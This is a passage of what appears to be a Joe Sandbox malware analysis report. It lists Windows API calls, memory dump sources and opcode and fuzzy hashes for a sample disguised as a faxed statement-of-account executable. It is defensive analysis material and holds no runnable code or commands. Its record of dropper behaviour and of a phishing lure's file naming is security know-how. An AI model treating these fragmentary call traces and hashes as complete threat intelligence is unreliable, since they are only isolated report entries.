                                                                                              • RegCloseKey.ADVAPI32(?,?,?,naysaying\Kalewives\eckhardts,00000000,00000011,00000002), ref: 004025FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3356406503-0
                                                                                              • Opcode ID: 6c4a6f71f6c62d0464e51e29f2e95dc368b421b9ed293c39dd30450e64948811
                                                                                              • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                              • Opcode Fuzzy Hash: 6c4a6f71f6c62d0464e51e29f2e95dc368b421b9ed293c39dd30450e64948811
                                                                                              • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                              • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                              APIs
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteValue
                                                                                              • String ID:
                                                                                              • API String ID: 2831762973-0
                                                                                              • Opcode ID: 5a5decf40fbd4b8d7fb2cec831c9c06c43f6210ea46548ac7f77a7f3d1b8e9ae
                                                                                              • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                                              • Opcode Fuzzy Hash: 5a5decf40fbd4b8d7fb2cec831c9c06c43f6210ea46548ac7f77a7f3d1b8e9ae
                                                                                              • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004057AD
                                                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004057F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2896919175-0
                                                                                              • Opcode ID: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
                                                                                              • Instruction ID: 683c9d360a8619809caff371317e20043972a5eac84f98be19084c03997f3dfe
                                                                                              • Opcode Fuzzy Hash: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
                                                                                              • Instruction Fuzzy Hash: 84F09072600600CBD6215B54AD01B17B764EB84304F45447FFF89732F0DB7A48529A6E
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3712363035-0
                                                                                              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 8047a4ce7624c57ac403026398a7a85b30205f8f0e2e6a0e1e0605c032d65afd
                                                                                              • Instruction ID: 7576989b042b157cf48fac083b749515e454fc9aff443d668f7e93ddc69dec41
                                                                                              • Opcode Fuzzy Hash: 8047a4ce7624c57ac403026398a7a85b30205f8f0e2e6a0e1e0605c032d65afd
                                                                                              • Instruction Fuzzy Hash: 5DE08676B10114EBCB15DBA8EE9086EB3A5FB44310750487FE502B3290D6759C05CB3C
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 0040615C
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                              APIs
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMove
                                                                                              • String ID:
                                                                                              • API String ID: 3562171763-0
                                                                                              • Opcode ID: fd7aae396ace87599e548a0d288645e5ca8fd9571b336d7c259ebb0c25f03179
                                                                                              • Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
                                                                                              • Opcode Fuzzy Hash: fd7aae396ace87599e548a0d288645e5ca8fd9571b336d7c259ebb0c25f03179
                                                                                              • Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE
                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                              Memory Dump Source
